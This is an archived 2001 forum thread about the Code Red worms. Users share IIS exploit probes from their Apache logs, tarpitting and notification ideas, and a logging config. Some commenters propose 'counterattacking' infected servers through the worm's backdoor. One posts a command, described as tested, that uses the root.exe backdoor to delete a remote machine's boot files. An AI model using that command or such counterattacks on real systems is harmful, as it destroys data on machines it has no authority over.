Code Red III

drcrja was the first to send us this brief bit about Code Red III which is apparently faster and more vicious than its entertaining predecessors. I'm still wondering what I should do with the hundreds of IPs in my desktop's apache log trying hopelessly to overflow my buffer.

More information?

[Dr.+Evil]

I've heard all sorts of rumours about this thing. Now whenever I hear people talk about "Code Red III", I give up asking them what it is. It doesn't exist. If it does, it is about time.

The media seems to think that Code Red 1 was July 19, Code Red 2 was Aug 1, Code Red 3 is the one with the back door. In otherwords, they're only figuring out now how bad Code Red II is.

Perhaps we should reconsider...

[Rob+Mac+K]

I know the reaction to a suggestion that someone create a worm that "fixes" the effects of the various CR worms provoked a highly negative response, but I wonder if the right thing to do to protect against the worm (actually, against all the morons still running these unpatched servers) would be to log an "attacking" IP, then "counterattack" by executing a command on those servers to shut them down, so they'd quit trying to infect everything in sight? I mean, geez, I know it's probably ethically (and legally) wrong to exploit the back doors, even if it's just to shut down the servers, but wouldn't that be better than sitting around doing nothing? (Since the various ISPs don't seem to be doing anything other than sending out e-mail - at this point, ignorance can't be an excuse for anyone still running an unpatched server).

Thoughts?

Re:Perhaps we should reconsider...

[norton_I]

I have been seriously considering the "counterattach" method for a while now (as opposed to a self replicating anti-virus, which I am firmly opposed to).

I guess part of the problem is you have to install not only the patch, but a service pack, and people who seem to know something about windows think that is hard to do remotely.

Here is another thought: Just write a counter strike that A) deletes code red and the back doors B) turns off IIS and disables it from starting at boot, and C) changes the homepage to something that says "Please install these patches, your system has been infected by Code Red."

This is based on the assumption that 99% of the people who haven't patched their webservers don't use them and have forgotten (or never knew) IIS was installed.

Re:Buffer overflow vulnerabilities

[Macrobat]

Tell you what. Show me the source for an OS coded in Java, I'll see if I can't find buffer overflow risks in it.

Could this be it?

[ecki]

Found a lot of those in my access.log...:

NN.NN.NN.NN - - [10/Aug/2001:04:11:20 -0700] "GET / HTTP/1.0" 200 7023
NN.NN.NN.NN - - [10/Aug/2001:04:11:20 -0700] "GET /753f7d950154aaec...1cc7 HTTP/1.0" 404 258
NN.NN.NN.NN - - [10/Aug/2001:04:11:20 -0700] "GET /scripts/root.exe HTTP/1.0" 404 210
NN.NN.NN.NN - - [10/Aug/2001:04:11:21 -0700] "GET /MSADC/root.exe HTTP/1.0" 404 208
NN.NN.NN.NN - - [10/Aug/2001:04:11:21 -0700] "GET /c/winnt/system32/cmd.exe HTTP/1.0" 404 218
NN.NN.NN.NN - - [10/Aug/2001:04:11:25 -0700] "GET /d/winnt/system32/cmd.exe HTTP/1.0" 404 218
NN.NN.NN.NN - - [10/Aug/2001:04:11:26 -0700] "GET /NULL.ida?http-42.AAAAAA...AAAAAAAAA=X HTTP/1.1" 404 214
NN.NN.NN.NN - - [10/Aug/2001:04:11:29 -0700] "GET / HTTP/1.0" 200 7023
NN.NN.NN.NN - - [10/Aug/2001:04:11:30 -0700] "GET /NULL.idq?http-42.AAAAAAAA...AAAAAAAA=X HTTP/1.1" 404 214
NN.NN.NN.NN - - [10/Aug/2001:04:11:33 -0700] "GET / HTTP/1.0" 200 7023

Or is there somebody trying to exploit the CodeRed backdoors? Mind you, this is within a supposedly protected firefall.

Use Open Source to Fight Code Red

[isn't+my+name]

Tom Liston came up with a cool idea for slowing Code Red and other TCP port scanners. He didn't have the bandwidth to host it, and I offered. So, this is a shameless plug, but if we can get enough of us doing this and get some press coverage, it's a great story that shows the power and speed with which open source solutions can be implemented. He first posted the idea on 7/31 just before Code Red started heating up again. Using the Trinux (http://www.thrinux.org) linux distribution, he cobbled together a floppy boot image that, with unused ip addresses and an old machine, can be used to slow the scans by responding to the initial TCP three way handshake and then ignoring everything else. The automated scanner has to time out before that thread can move on. According to reports on the SANS Intrusions discussion list, it seems to slow all variants of Code Red and on RPC scans as well. His announcement of LaBrea is at: http://www.incidents.org/archives/intrusions/msg01 368.html

Re:You know...

[pmz]

Just write a new version that infects IIS, shuts it off, installs a better web server, and voil&agrave, the world is a better place! It would be even better to uninstall IIS, but we all know it's impossible to uninstall Windows software.

Microsoft feature?

[sjonke]

Noticing code red scanning my OS X Mac, I contacted the owner of the offending machine (actually the net admin on which the machine resided) and found out that the user of the computer (a portable) did not even know that he was running IIs.

Tested, working... Effective.

/root.exe?/c+del+/a+srh+/q+/f+c:\ntldr.*

Bye bye boot process...

Re:Why aren't these machines patched yet?

It is interesting that most of the machines attacking me are from korea and turkey.. Only 5% of attacks towards my machine are comming from US IP space. I think Micro$oft should send people door to door overseas and patch the machines..

Re:Copycats

[analog_line]

Whaddaya mean it's dead? If the traffic light on my cable modem is any indication, it's still alive and kicking. Maybe it ain't "cool" anymore but it's still out there and making a mess of things.

The only thing that's going to "let it die" is if the stupidity/incompetence that this virus so neatly reveals is cured and people patch their fucking servers. Until then, there's plenty to talk about. Hell, there's more to talk about. It's getting close to a month that systems have been getting hit by this virus and people are still being infected when an easy solution has been available for over two months. What planet are these people on?

An ETHICAL way to Anti-Virus

[Slur]

Hi,

I've been watching my Apache log as I get hit about every 10 minutes by Code Red. For each source IP address I've been doing a reverse lookup and if successful then notifying the webmaster of the source domain about the infected computer on their network.

I'd like to automate this process and generate a "form" email, filling in the relevant details, but I'm not sure how to cause a script to be invoked by a change in the Apache log, except to maybe run a 5 minute cron job that grabs all the Code Red attacks and then renames the log file.

An example of the email I've been sending is this:

Hi,

Just a note to let you know that a copy of the Code Red virus is on your network attacking my web server. The source IP address is: 207.151.xxx.xxx which a reverse lookup shows as xxx.xxx.gdsl.nwc.net . If this is a customer on your network then please pass on to that individual that they need to reboot their NT/W2K server and possibly reinstall their OS. They will also need to get a patch from Microsoft to correct this vulnerability.


This is probably a very miniscule thing to do, but it does - in a way - inoculate against the virus, at least on consumer DSL networks, and in a manner that is both ethical and - like a virus - fairly contagious. I've heard a lot of buzz in places like Slashdot about making an "anti-virus" but why haven't I heard this kind of thing suggested before?

Code Red infection in spite of patch

[shibut]

At work we have a M$ w2k brand new server (installed the last week of July). The server was patched before August 1 and did not have plain vanilla CR. Nevertheless, on Sunday August 6th we still got semi-infected with CRII. I say semi infected since it totally ruined our server's ability to function properly but did not try to infect other machines. When our IT support guy called M$, they claimed we should re-install the patch but went to great lengths to make us re-download the patch from a url they specified (instead of using the patch file we had downloaded at the end of July). This makes me think that maybe they improved the patch since then. Re-installing the patch solved some of the problems and the rest our IT guy had to fix manually.

We've been CR-free for 2 whole days now

For the record: I wanted a Linux server but the guys at work (I'm a gal) didn't want to give up the potential to share calendars (they don't actually use it at the moment but options have value on paper at a VC firm...).

Re:Why aren't these machines patched yet?

[nether]

Because the patch does not fix the problem completely. Even if your server is patched, if you are redirecting URLs, the worm will be able to infect your machine. http://archives.neohapsis.com/archives/incidents/2 001-08/0218.html

I saw that Reuters story earlier

[GC]

but I have not seen any instances of attempted infection.

It's all very vague and the chances of mistaking Code Red rev C as Code Red III, (rev C = version II) are simply too high.

I also assume that this takes advantage of the same Index Vulnerability in IIS, which if anyone has been hit by either of the first two versions then they will have minimised the risks of a new version which uses the same vulnerability.

Re:Stop addressing Code Red

[Geoff]

The issue is system administrators need to take proactive measures to make sure their systems have been patched. That's the problem and thats what needs to be addressed.

Sysadmins aren't entirely at fault. Certainly, this particular problem has received enough coverage that there really shouldn't be any unpatched IIS installations any more (but there are, sigh), but the other side is that it's pretty near impossible to keep up with every patch to every system.

Here's a good rant on the subject entitled The Security Patch Treadmill. It was written in March 2001, before Code Red. It still applies. A quote:

Those who manage computer networks are people too, and people don't always do the smartest thing. They know they're supposed to install all patches. But sometimes they can't take critical systems off-line. Sometimes they don't have the staffing available to patch every system on their network. Sometimes applying a patch breaks something else on their network. I think it's time the industry realized that expecting the patch process to improve network security just doesn't work.

Put it in another log and forget about it.

[Malc]

"I'm still wondering what I should do with the hundreds of IPs in my desktop's apache log trying hopelessly to overflow my buffer. "

I'm not even sure how to spell regexe, but this is what I've attempted to do:

SetEnvIf Request_URI /(.*default.ida.*$) code-red-request
CustomLog /var/log/apache/code-red-request.log common env=code-red-request
#CustomLog /var/log/apache/access.log common
CustomLog /var/log/apache/access.log common env=!code-red-request

RedirectMatch Permanent /(.*default.ida.*$) http://127.0.0.1/$1